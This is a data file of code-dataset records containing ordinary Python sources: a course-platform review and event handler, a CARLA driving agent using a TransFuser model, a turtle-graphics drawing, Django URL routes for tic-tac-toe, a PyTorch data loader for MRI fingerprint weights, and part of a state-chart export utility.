review_due_date.strftime(HUMAN_READABLE_DATETIME_FORMAT))\n self.template_value['error_code'] = 'review_deadline_exceeded'\n self.render('error.html')\n return\n\n mark_completed = (self.request.get('is_draft') == 'false')\n self.template_value['is_draft'] = (not mark_completed)\n\n review_payload = self.request.get('answers')\n review_payload = transforms.loads(\n review_payload) if review_payload else []\n try:\n rp.write_review(\n unit.unit_id, review_step_key, review_payload, mark_completed)\n course.update_final_grades(student)\n except domain.TransitionError:\n self.template_value['error_code'] = 'review_already_submitted'\n self.render('error.html')\n return\n\n self.render('review_confirmation.html')\n\n\nclass EventsRESTHandler(BaseRESTHandler):\n \"\"\"Provides REST API for an Event.\"\"\"\n\n def get(self):\n \"\"\"Returns a 404 error; this handler should not be GET-accessible.\"\"\"\n self.error(404)\n return\n\n def _add_location_facts(self, payload_json):\n payload_dict = transforms.loads(payload_json)\n if 'loc' not in payload_dict:\n payload_dict['loc'] = {}\n loc = payload_dict['loc']\n loc['locale'] = self.get_locale_for(self.request, self.app_context)\n loc['language'] = self.request.headers.get('Accept-Language')\n loc['country'] = self.request.headers.get('X-AppEngine-Country')\n loc['region'] = self.request.headers.get('X-AppEngine-Region')\n loc['city'] = self.request.headers.get('X-AppEngine-City')\n lat_long = self.request.headers.get('X-AppEngine-CityLatLong')\n if lat_long:\n latitude, longitude = lat_long.split(',')\n loc['lat'] = float(latitude)\n loc['long'] = float(longitude)\n payload_json = transforms.dumps(payload_dict).lstrip(\n models.transforms.JSON_XSSI_PREFIX)\n return payload_json\n\n def post(self):\n \"\"\"Receives event and puts it into datastore.\"\"\"\n\n COURSE_EVENTS_RECEIVED.inc()\n can = (\n CAN_PERSIST_ACTIVITY_EVENTS.value or\n CAN_PERSIST_PAGE_EVENTS.value or\n CAN_PERSIST_TAG_EVENTS.value)\n if not can:\n return\n\n request = transforms.loads(self.request.get('request'))\n if not self.assert_xsrf_token_or_fail(request, 'event-post', {}):\n return\n\n user = self.get_user()\n if not user:\n return\n\n source = request.get('source')\n payload_json = request.get('payload')\n payload_json = self._add_location_facts(payload_json)\n models.EventEntity.record(source, user, payload_json)\n COURSE_EVENTS_RECORDED.inc()\n\n self.process_event(user, source, payload_json)\n\n def process_event(self, user, source, payload_json):\n \"\"\"Processes an event after it has been recorded in the event stream.\"\"\"\n\n student = models.Student.get_enrolled_student_by_email(user.email())\n if not student:\n return\n\n payload = transforms.loads(payload_json)\n\n if 'location' not in payload:\n return\n\n source_url = payload['location']\n\n if source in TAGS_THAT_TRIGGER_BLOCK_COMPLETION:\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n if unit_id is not None and lesson_id is not None:\n self.get_course().get_progress_tracker().put_block_completed(\n student, unit_id, lesson_id, payload['index'])\n elif source in TAGS_THAT_TRIGGER_COMPONENT_COMPLETION:\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n cpt_id = payload['instanceid']\n if (unit_id is not None and lesson_id is not None and\n cpt_id is not None):\n self.get_course().get_progress_tracker(\n ).put_component_completed(\n student, unit_id, lesson_id, cpt_id)\n elif source in TAGS_THAT_TRIGGER_HTML_COMPLETION:\n # Records progress for scored 
lessons.\n unit_id, lesson_id = get_unit_and_lesson_id_from_url(\n self, source_url)\n course = self.get_course()\n unit = course.find_unit_by_id(unit_id)\n lesson = course.find_lesson_by_id(unit, lesson_id)\n if (unit_id is not None and\n lesson_id is not None and\n not lesson.manual_progress):\n self.get_course().get_progress_tracker().put_html_completed(\n student, unit_id, lesson_id)\n","sub_path":"appengine/controllers/lessons.py","file_name":"lessons.py","file_ext":"py","file_size_in_byte":53680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"230107051","text":"import os\nimport json\nimport datetime\nimport pathlib\nimport time\nimport cv2\nimport carla\nfrom collections import deque\n\nimport torch\nimport carla\nimport numpy as np\nfrom PIL import Image\n\nfrom leaderboard.autoagents import autonomous_agent\nfrom transfuser.model import TransFuser\nfrom transfuser.config import GlobalConfig\nfrom transfuser.data import scale_and_crop_image, lidar_to_histogram_features, transform_2d_points\nfrom team_code.planner import RoutePlanner\n\nimport math\nfrom matplotlib import cm\nfrom copy import deepcopy\n\n\nSAVE_PATH = None#os.environ.get('SAVE_PATH', None)\n\n\ndef get_entry_point():\n return 'TransFuserAgent'\n\n\nclass TransFuserAgent(autonomous_agent.AutonomousAgent):\n def setup(self, path_to_conf_file):\n self.lidar_processed = list()\n self.track = autonomous_agent.Track.SENSORS\n self.config_path = path_to_conf_file\n self.step = -1\n self.wall_start = time.time()\n self.initialized = False\n \n self.stuck_detector = 0\n self.forced_move = 0\n self.dilation = 10 # Dilation that was applied when collecting the data.\n self.lidar_saftey = []\n\n self.input_buffer = {'rgb': deque(), 'rgb_left': deque(), 'rgb_right': deque(), \n 'rgb_rear': deque(), 'lidar': deque(), 'gps': deque(), 'thetas': deque(), 'velocity': deque()}\n\n self.config = GlobalConfig()\n self.net = TransFuser(self.config, 'cuda')\n self.net.load_state_dict(torch.load(os.path.join(path_to_conf_file, 'best_model.pth')))\n self.net.cuda()\n self.net.eval()\n\n self.save_path = None\n if SAVE_PATH is not None:\n now = datetime.datetime.now()\n string = pathlib.Path(os.environ['ROUTES']).stem + '_'\n string += '_'.join(map(lambda x: '%02d' % x, (now.month, now.day, now.hour, now.minute, now.second)))\n\n print (string)\n\n self.save_path = pathlib.Path(os.environ['SAVE_PATH']) / string\n self.save_path.mkdir(parents=True, exist_ok=False)\n\n (self.save_path / 'rgb').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'lidar_0').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'lidar_1').mkdir(parents=True, exist_ok=False)\n (self.save_path / 'meta').mkdir(parents=True, exist_ok=False)\n\n def _init(self):\n self._route_planner = RoutePlanner(4.0, 50.0)\n self._route_planner.set_route(self._global_plan, True)\n\n self.initialized = True\n\n def _get_position(self, tick_data):\n gps = tick_data['gps']\n gps = (gps - self._route_planner.mean) * self._route_planner.scale\n\n return gps\n\n def sensors(self):\n return [\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -60.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_left'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': 1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 
'yaw': 60.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_right'\n },\n {\n 'type': 'sensor.camera.rgb',\n 'x': -1.3, 'y': 0.0, 'z':2.3,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -180.0,\n 'width': 400, 'height': 300, 'fov': 100,\n 'id': 'rgb_rear'\n },\n { \n 'type': 'sensor.lidar.ray_cast',\n 'x': 1.3, 'y': 0.0, 'z': 2.5,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': -90.0,\n 'id': 'lidar'\n },\n {\n 'type': 'sensor.other.imu',\n 'x': 0.0, 'y': 0.0, 'z': 0.0,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'sensor_tick': 0.05,\n 'id': 'imu'\n },\n {\n 'type': 'sensor.other.gnss',\n 'x': 0.0, 'y': 0.0, 'z': 0.0,\n 'roll': 0.0, 'pitch': 0.0, 'yaw': 0.0,\n 'sensor_tick': 0.01,\n 'id': 'gps'\n },\n {\n 'type': 'sensor.speedometer',\n 'reading_frequency': 20,\n 'id': 'speed'\n }\n ]\n \n def tick(self, input_data):\n self.step += 1\n\n rgb = cv2.cvtColor(input_data['rgb'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_left = cv2.cvtColor(input_data['rgb_left'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_right = cv2.cvtColor(input_data['rgb_right'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n rgb_rear = cv2.cvtColor(input_data['rgb_rear'][1][:, :, :3], cv2.COLOR_BGR2RGB)\n gps = input_data['gps'][1][:2]\n speed = input_data['speed'][1]['speed']\n compass = input_data['imu'][1][-1]\n if (math.isnan(compass) == True): #It can happen that the compass sends nan for a few frames\n compass = 0.0\n lidar = input_data['lidar'][1][:, :3]\n\n result = {\n 'rgb': rgb,\n 'rgb_left': rgb_left,\n 'rgb_right': rgb_right,\n 'rgb_rear': rgb_rear,\n 'lidar': lidar,\n 'gps': gps,\n 'speed': speed,\n 'compass': compass,\n }\n \n pos = self._get_position(result)\n result['gps'] = pos\n next_wp, next_cmd = self._route_planner.run_step(pos)\n result['next_command'] = next_cmd.value\n\n theta = compass + np.pi/2\n R = np.array([\n [np.cos(theta), -np.sin(theta)],\n [np.sin(theta), np.cos(theta)]\n ])\n\n local_command_point = np.array([next_wp[0]-pos[0], next_wp[1]-pos[1]])\n local_command_point = R.T.dot(local_command_point)\n result['target_point'] = tuple(local_command_point)\n\n return result\n\n @torch.no_grad()\n def run_step(self, input_data, timestamp):\n if not self.initialized:\n self._init()\n\n tick_data = self.tick(input_data)\n\n if self.step < (self.config.seq_len * self.dilation):\n rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))\n \n if not self.config.ignore_sides:\n rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))\n \n rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_rear:\n rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))\n\n self.input_buffer['lidar'].append(tick_data['lidar'])\n self.input_buffer['gps'].append(tick_data['gps'])\n self.input_buffer['thetas'].append(tick_data['compass'])\n self.input_buffer['velocity'].append(torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32))\n\n control = carla.VehicleControl()\n 
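# The input buffer is still warming up, so emit a neutral control\n            # (zero steer, throttle and brake) until enough frames are buffered.\n            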
control.steer = 0.0\n control.throttle = 0.0\n control.brake = 0.0\n \n return control\n\n command = torch.FloatTensor([tick_data['next_command']]).to('cuda', dtype=torch.float32)\n\n tick_data['target_point'] = [torch.FloatTensor([tick_data['target_point'][0]]),\n torch.FloatTensor([tick_data['target_point'][1]])]\n target_point = torch.stack(tick_data['target_point'], dim=1).to('cuda', dtype=torch.float32)\n\n encoding = []\n rgb = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb'].popleft()\n self.input_buffer['rgb'].append(rgb.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_sides:\n rgb_left = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_left']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_left'].popleft()\n self.input_buffer['rgb_left'].append(rgb_left.to('cuda', dtype=torch.float32))\n \n rgb_right = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_right']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_right'].popleft()\n self.input_buffer['rgb_right'].append(rgb_right.to('cuda', dtype=torch.float32))\n\n if not self.config.ignore_rear:\n rgb_rear = torch.from_numpy(scale_and_crop_image(Image.fromarray(tick_data['rgb_rear']), crop=self.config.input_resolution)).unsqueeze(0)\n self.input_buffer['rgb_rear'].popleft()\n self.input_buffer['rgb_rear'].append(rgb_rear.to('cuda', dtype=torch.float32))\n\n self.input_buffer['lidar'].popleft()\n self.input_buffer['lidar'].append(tick_data['lidar'])\n self.input_buffer['gps'].popleft()\n self.input_buffer['gps'].append(tick_data['gps'])\n self.input_buffer['thetas'].popleft()\n self.input_buffer['thetas'].append(tick_data['compass'])\n self.input_buffer['velocity'].popleft()\n self.input_buffer['velocity'].append(torch.FloatTensor([tick_data['speed']]).to('cuda', dtype=torch.float32))\n\n # transform the lidar point clouds to local coordinate frame\n ego_theta = self.input_buffer['thetas'][-1]\n ego_x, ego_y = self.input_buffer['gps'][-1]\n\n \n\n #Only predict every second step because we only get a front LiDAR every second frame.\n if(self.step % 2 == 0):\n # Check safety area\n # Defines a cube in front of the car that acts as safety area.\n lidar_saftey = deepcopy(tick_data['lidar'])\n lidar_saftey[:, 1] *= -1 # inverts x, y\n lidar_saftey = lidar_saftey[lidar_saftey[..., 2] > -2.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 2] < -1.05] # 0.98\n lidar_saftey = lidar_saftey[lidar_saftey[..., 1] > -3.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 1] < 0.0]\n lidar_saftey = lidar_saftey[lidar_saftey[..., 0] > -1.066]\n self.lidar_saftey = lidar_saftey[lidar_saftey[..., 0] < 1.066]\n \n indices = []\n # The past 3 frames dilated by 10\n for i in range(self.config.seq_len):\n indices.append(i * self.dilation + (self.dilation - 1))\n \n self.lidar_processed = []\n for i, lidar_point_cloud_reference in enumerate(self.input_buffer['lidar']):\n # We only process the lidars that we actually need. Reduces the time of this for loop from 100ms to 15ms with seq_len = 3\n if(not (i in indices)):\n self.lidar_processed.append([])\n continue\n # We will flip the y axis of the data. 
To avoid doing it multiple times on the same data we need to copy it.\n                lidar_point_cloud = deepcopy(lidar_point_cloud_reference) \n                \n                curr_theta = self.input_buffer['thetas'][i]\n                curr_x, curr_y = self.input_buffer['gps'][i]\n                \n                lidar_point_cloud[:, 1] *= -1 # flip the y axis\n                \n                # Voxelize to BEV for NN to process\n                \n                lidar_transformed = transform_2d_points(lidar_point_cloud, np.pi / 2 - curr_theta, -curr_x, -curr_y, #500mu\n                                                        np.pi / 2 - ego_theta, -ego_x, -ego_y)\n                \n                \n                lidar_transformed = torch.from_numpy(\n                    lidar_to_histogram_features(lidar_transformed, crop=self.config.input_resolution)).unsqueeze(0) #3ms\n                \n                self.lidar_processed.append(lidar_transformed.to('cuda', dtype=torch.float32))\n            \n            input_images = [self.input_buffer['rgb'][i] for i in indices]\n            if not self.config.ignore_sides:\n                input_images += [self.input_buffer['rgb_left'][i] for i in indices]\n                input_images += [self.input_buffer['rgb_right'][i] for i in indices]\n            if not self.config.ignore_rear:\n                input_images += [self.input_buffer['rgb_rear'][i] for i in indices]\n            input_lidars = [self.lidar_processed[i] for i in indices]\n            input_velocities = [self.input_buffer['velocity'][i] for i in indices] # Used when we use seq_len velocity values\n            #input_velocities = self.input_buffer['velocity'][indices[-1]] #Used when we only use 1 velocity value\n            \n            #Debug input data.\n            #for idx, elem in enumerate(input_lidars):\n            # Image.fromarray(cm.gist_earth(elem.cpu().numpy()[0, 1], bytes=True)).save(self.save_path / 'lidar_1' / (('%04d_' % self.step) + ('%04d.png' % idx)))\n            #for idx, elem in enumerate(input_images):\n            # elem = np.transpose(elem.cpu().numpy()[0], (1,2,0)).astype(np.uint8)\n            # Image.fromarray(elem).save(self.save_path / 'rgb' / (('%04d_' % self.step) + ('%04d.png' % idx)))\n            \n            self.pred_wp, _, _ = self.net(input_images, input_lidars, target_point, input_velocities)\n\n        is_stuck = False\n        if(self.stuck_detector > 900 and self.forced_move < 30): # 900 = 45 seconds * 20 frames per second; we move for 1.5 seconds = 30 frames to unblock\n            print("Detected agent being stuck. Move for frame: ", self.forced_move)\n            is_stuck = True\n            self.forced_move += 1\n        \n        gt_velocity = self.input_buffer['velocity'][-1]\n        steer, throttle, brake, metadata = self.net.control_pid(self.pred_wp, gt_velocity, is_stuck)\n        self.pid_metadata = metadata\n\n        if brake < 0.05: brake = 0.0\n        if throttle > brake: brake = 0.0\n\n        if(gt_velocity < 0.1):\n            self.stuck_detector += 1\n        elif(gt_velocity > 0.1 and is_stuck == False):\n            self.stuck_detector = 0\n            self.forced_move = 0\n\n        # Safety controller. Stops the car in case something is directly in front of it.\n        control = carla.VehicleControl()\n        emergency_stop = (len(self.lidar_saftey) > 0) # True when LiDAR points were detected inside the safety area\n        if(emergency_stop):\n            print("Detected object directly in front of the vehicle. Stopping. Step:", self.step)\n            control.steer = float(steer)\n            control.throttle = float(0.0)\n            control.brake = float(True)\n            #Will also overwrite the stuck detector. 
If we are stuck in traffic we do want to wait it out.\n else:\n control.steer = float(steer)\n control.throttle = float(throttle)\n control.brake = float(brake)\n\n # if SAVE_PATH is not None and self.step % self.dilation == 0:\n # self.save(tick_data)\n\n return control\n\n def save(self, tick_data):\n frame = self.step // self.dilation\n\n Image.fromarray(tick_data['rgb']).save(self.save_path / 'rgb' / ('%04d.png' % frame))\n\n Image.fromarray(cm.gist_earth(self.lidar_processed[0].cpu().numpy()[0, 0], bytes=True)).save(self.save_path / 'lidar_0' / ('%04d.png' % frame))\n Image.fromarray(cm.gist_earth(self.lidar_processed[0].cpu().numpy()[0, 1], bytes=True)).save(self.save_path / 'lidar_1' / ('%04d.png' % frame))\n\n\n outfile = open(self.save_path / 'meta' / ('%04d.json' % frame), 'w')\n json.dump(self.pid_metadata, outfile, indent=4)\n outfile.close()\n\n def destroy(self):\n del self.net\n\n","sub_path":"leaderboard/team_code/transfuser_agent.py","file_name":"transfuser_agent.py","file_ext":"py","file_size_in_byte":16784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128893523","text":"'''This program was written by William Michael McIntosh\n\nIt will command a turtle to draw a picture of space with planets.\nI used randomized locations, sizes, and colors, yet kept planet shading.\nRuntime is approximately 60 seconds.\nDate Created: 1/15/2019'''\n\nimport turtle as t\nimport random\n\nt.setup(1280, 800)\nt.bgcolor(\"black\") # < Using the color string \"black\"\nt.setworldcoordinates(0,0,1200,700)\n\nt.pensize(3) #Pen Size\nt.hideturtle()\nt.penup()\n\nstarcount = 1\nwhile (starcount < 80):\n\n # Speed up for stars\n t.speed(1000)\n\n # Choose random position\n xpos = random.randint(20,1150)\n ypos = random.randint(20,750)\n t.goto(xpos,ypos)\n\n # White color\n t.color(1.0,1.0,1.0)\n\n # Choose Random Star Size\n starsize = random.randint(2,14)\n\n # Create Star\n drawstar = 0\n while (drawstar < 5):\n t.pendown()\n t.right(144)\n t.forward(starsize)\n t.penup()\n drawstar = drawstar + 1\n\n # Increment starcount\n starcount = starcount + 1\n\nplanetcount = 1\nwhile (planetcount < 12):\n\n # Slow down for planets\n t.speed(50)\n\n # Choose random position\n xpos = random.randint(20,1150)\n ypos = random.randint(20,750)\n t.goto(xpos,ypos)\n\n # Choose random color\n rcolor = random.randint(4,8)\n gcolor = random.randint(4,8)\n bcolor = random.randint(4,8)\n rcolor = rcolor / 10\n gcolor = gcolor / 10\n bcolor = bcolor / 10\n t.color(rcolor,gcolor,bcolor)\n\n # Choose random planet size\n planet_size = random.randint(20,100)\n\n # Create planet\n t.begin_fill()\n t.circle(planet_size)\n t.end_fill()\n\n # Set shade color\n rcolor = rcolor - .2\n gcolor = gcolor - .2\n bcolor = bcolor - .2\n t.color(rcolor,gcolor,bcolor)\n\n # Draw shade\n t.begin_fill()\n t.circle(planet_size, 100)\n t.end_fill()\n\n # Move turtle to point along circumference\n t.circle(planet_size, 80)\n\n # Set light color\n rcolor = rcolor + .4\n gcolor = gcolor + .4\n bcolor = bcolor + .4\n t.color(rcolor,gcolor,bcolor)\n\n # Draw light\n t.begin_fill()\n t.circle(planet_size, 100)\n t.end_fill()\n\n # Reset Turtle Position\n t.goto(1,1)\n t.setheading(0)\n\n # Increment planetcount\n planetcount = planetcount + 1\n\n# Choose random position\nxpos = random.randint(200,1000)\nypos = random.randint(200,600)\nt.goto(xpos,ypos)\n\n\n# Lime Green UFO Dome\nt.color(\"#00FF00\")\nt.begin_fill()\nt.circle(50)\nt.end_fill()\n\n# Light Blue UFO 
Body\nt.setheading(0)\nt.forward(155)\nt.left(130)\nt.color(\"#ADD8E6\")\nt.begin_fill()\nt.circle(200,100)\nt.end_fill()\nt.setheading(90)\nt.forward(15)\nt.right(90)\n\n# Pink UFO Lights\npink_lights = 0\nwhile pink_lights < 5:\n t.forward(50)\n t.color(\"Pink\")\n t.begin_fill()\n t.circle(10)\n t.end_fill()\n pink_lights = pink_lights + 1\n","sub_path":"Will_McIntosh_Shapes_Assignment2.py","file_name":"Will_McIntosh_Shapes_Assignment2.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442934142","text":"# Tic-tac-Toe \n# javascript\n# 2011 Eric Schug\n# \nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n\nurlpatterns = patterns('',\n # board\n (r'^$', 'ecstictactoe.tictactoe.views.gameView'),\n # move (ajax)\n (r'^move/$', 'ecstictactoe.tictactoe.views.getmove'),\n (r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n\n)\n","sub_path":"ecstictactoe/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"533548184","text":"\n\nfrom torch.autograd import Variable\nimport numpy as np\nimport os\nimport torch\n\nimport mf_utils as util\n\nnum_fasc = 2\n\nuse_pretrained = False\nuse_GPU = False\n\nsum_to_one = False\nremove_mean = True\nunit_variance = True\ncenter_target = True\nSNR_dist = 'uniform' # 'uniform' or 'triangular'\nnormalisation = False\n\nnum_epochs = 5\nbatch_size = 200\nmyseed = 141414\n\ntarget_names = ['nu1', 'r1 ', 'f1 ', 'nu2', 'r2 ', 'f2 ']\nnum_var = len(target_names)\n\nassert unit_variance != sum_to_one, (\"Choose one of two normalization \"\n \"strategies: either unit sum or unit \"\n \"variance.\")\n\n#Test \nif SNR_dist == 'uniform':\n nnls_output = util.loadmat('data_TEST3_article/training_data_fixedSNR_15000_samples_lou_TEST3_article')\n validation_data = nnls_output\n print(nnls_output['nnz_hist_0'])\n\n# Substrate (=fingerprint) properties\nsub_rads = nnls_output['subinfo']['rad'] # Python list\nsub_fins = nnls_output['subinfo']['fin'] # Python list\ntot_samples = nnls_output['num_samples']\n\n#%% For normalization of target outputs\n\nif normalisation:\n rad_min = np.min(nnls_output['subinfo']['rad'])\n rad_range = np.max(nnls_output['subinfo']['rad']) - rad_min\n print(rad_range)\n fin_min = np.min(nnls_output['subinfo']['fin'])\n fin_range = np.max(nnls_output['subinfo']['fin']) - fin_min\n nu_min = nnls_output['nu_min']\n nu_range = nnls_output['nu_max'] - nu_min\n trgt_true_min = np.array([nu_min, rad_min, fin_min,\n nu_min, rad_min, fin_min])\n trgt_true_range = np.array([nu_range, rad_range, fin_range,\n nu_range, rad_range, fin_range])\n if center_target:\n # Ultimately, we should map each variable to [-sqrt(3), sqrt(3)] to ensure\n # unit variance of the output\n trgt_proj_min = np.array([-nu_range/2, -0.5, -fin_range/2,\n -nu_range/2, -0.5, -fin_range/2])\n trgt_proj_range = np.array([nu_range, 1, fin_range,\n nu_range, 1, fin_range])\n else:\n # Initially, we let nu and fin take their \"natural\" values and mapped rad\n # to [0,1]\n trgt_proj_min = np.array([nu_min, 0, fin_min,\n nu_min, 0, fin_min])\n trgt_proj_range = np.array([nu_range, 1, fin_range,\n nu_range, 1, fin_range])\n \n \n\n#%% Function\n\ndef gen_batch_data(start, end, mode):\n print(mode)\n if end > tot_samples:\n 
raise ValueError(\"Only %d data samples available. Asked for samples \"\n \"up to %d.\" % (tot_samples, end))\n batch_size = end-start\n\n if mode == 'train':\n print('avec est ori')\n if nnls_output['sparse']:\n w_store = np.zeros((batch_size,\n nnls_output['num_fasc'] *\n nnls_output['num_atoms']))\n isbatch = ((nnls_output['w_idx'][:, 0] >= start) &\n (nnls_output['w_idx'][:, 0] < end))\n chk = (np.sum(isbatch) ==\n np.sum(nnls_output['nnz_hist'][start:end]))\n assert chk, (\"Mismatch non-zero elements in samples \"\n \"%d (incl.) to %d (excl.)\" % (start, end))\n w_idx = nnls_output['w_idx'][isbatch, :]\n w_store[w_idx[:, 0] - start,\n w_idx[:, 1]] = nnls_output['w_data'][isbatch]\n else:\n w_store = nnls_output['w_store'][start:end, :]\n \n elif mode == 'TrueOri':\n print('avec true ori')\n if nnls_output['sparse']:\n print('sparse')\n w_store = np.zeros((batch_size,\n nnls_output['num_fasc'] *\n nnls_output['num_atoms']))\n isbatch = ((nnls_output['w_idx_0'][:, 0] >= start) &\n (nnls_output['w_idx_0'][:, 0] < end))\n chk = (np.sum(isbatch) ==\n np.sum(nnls_output['nnz_hist_0'][start:end]))\n assert chk, (\"Mismatch non-zero elements in samples \"\n \"%d (incl.) to %d (excl.)\" % (start, end))\n w_idx = nnls_output['w_idx_0'][isbatch, :]\n w_store[w_idx[:, 0] - start,\n w_idx[:, 1]] = nnls_output['w_data_0'][isbatch]\n else:\n w_store = nnls_output['w_store_0'][start:end, :]\n\n #else:\n #raise ValueError('Unknown mode %s' % mode\n \n # NNLS weights no more normalized to sum to 1 after April 26, 2019.\n if sum_to_one:\n # Must be done before mean is removed!\n w_store = w_store/np.sum(w_store, axis=1)[:, np.newaxis]\n\n if remove_mean:\n w_store = w_store - np.mean(w_store, axis=1)[:, np.newaxis]\n\n if unit_variance:\n std_w = np.std(w_store, axis=1)\n idx_pos_std = np.where(std_w > 0)[0]\n w_store[idx_pos_std, :] = (w_store[idx_pos_std, :] /\n std_w[idx_pos_std][:, np.newaxis])\n # Zero variance (constant weights): normalize if non-zero weights\n # Case which should not occur too often: w_store[i, j] = C > 0 for all\n # j in [0, num_fasc*num_atoms]\n w_L1 = np.sum(np.abs(w_store), axis=1) # (Nbatch,)\n idx_pos_const = np.where((std_w == 0) & (w_L1 > 0))[0]\n if idx_pos_const.size > 0:\n w_store[idx_pos_const, :] = (w_store[idx_pos_const, :] /\n w_L1[idx_pos_const][:, np.newaxis])\n print(\"%d samples containing identical positive weights for \"\n \"all the atoms of the dictionary!\" % idx_pos_const.size)\n\n # Data contains w12 normalized to sum to one\n data = torch.from_numpy(w_store).float()\n\n # Target contains nu1, r1, f1, nu2, r2, f2\n batch_IDs = nnls_output['IDs'][start:end, :]\n batch_nus = nnls_output['nus'][start:end, :]\n\n \n #Normalisation ou pas\n target = torch.FloatTensor(batch_size, num_fasc * (1 + 2)).zero_()\n if normalisation == True:\n target[:, [0, 3]] = (trgt_proj_min[0] +\n trgt_proj_range[0] *\n (torch.from_numpy(batch_nus).float() -\n trgt_true_min[0]) /\n trgt_true_range[0])\n target[:, [1, 4]] = (trgt_proj_min[1] +\n trgt_proj_range[1] *\n (torch.FloatTensor(sub_rads)[batch_IDs] -\n trgt_true_min[1]) /\n trgt_true_range[1])\n target[:, [2, 5]] = (trgt_proj_min[2] +\n trgt_proj_range[2] *\n (torch.FloatTensor(sub_fins)[batch_IDs] -\n trgt_true_min[2]) /\n trgt_true_range[2])\n elif normalisation == False:\n target[:, [0, 3]] = torch.from_numpy(batch_nus).float()\n target[:, [1, 4]] = torch.FloatTensor(sub_rads)[batch_IDs]\n target[:, [2, 5]] = torch.FloatTensor(sub_fins)[batch_IDs]\n \n if use_GPU and torch.cuda.is_available():\n data = data.cuda()\n 
target = target.cuda()\n return Variable(data), Variable(target)","sub_path":"getDataW.py","file_name":"getDataW.py","file_ext":"py","file_size_in_byte":7220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"285543677","text":"\"\"\" Compiled: 2020-09-18 10:38:52 \"\"\"\n\n#__src_file__ = \"extensions/BDExport/./etc/FExportUtils.py\"\n\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FExportUtils\n\n (c) Copyright 2018 FIS FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n A collection of helper classes and functions for export base.\n See ExportBaseReadMe.py for more information about this module\n\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport acm\nimport FAssetManagementUtils\nimport FStateChartUtils\nimport FLogger\nlogger = FLogger.FLogger.GetLogger(\"BD Export\")\n\ndef StandardExportEventId():\n return 'Export Executed'\n\ndef CreateStateChart(name, definition, layout=None, limit='Unlimited'):\n \"\"\"Creates a state chart with the given name, if required.\n\n The definition parameter must completely define the content of the business\n process state chart, including all states and transitions between them. Its\n format is a dictionary of states mapped to a dictionary of transitions as\n event->next_state items, e.g.:\n\n {'state a': {'event to go to b': 'state b', 'event to go to c': 'state c'}}\n\n All defined next_states values must be unique within a state's transitions\n (i.e. multiple events cannot lead to the same next_state).\n\n \"\"\"\n sc = acm.FStateChart[name]\n if sc:\n return sc\n\n sc = acm.FStateChart(name=name)\n sc.BusinessProcessesPerSubject(limit)\n\n # Create all states, including those referenced in transitions\n state_names = definition.keys()\n for all_transitions in definition.values():\n state_names.extend([s for s in all_transitions.values() if s not in state_names])\n\n for state_name in (s for s in state_names if s not in ('Ready', 'Error')):\n sc.CreateState(state_name)\n sc.Commit()\n states = sc.StatesByName()\n\n # Link states based on transitions, creating events as required\n for state_name, transitions in definition.items():\n state = states.At(state_name)\n for event_name, to_state_name in transitions.items():\n event = 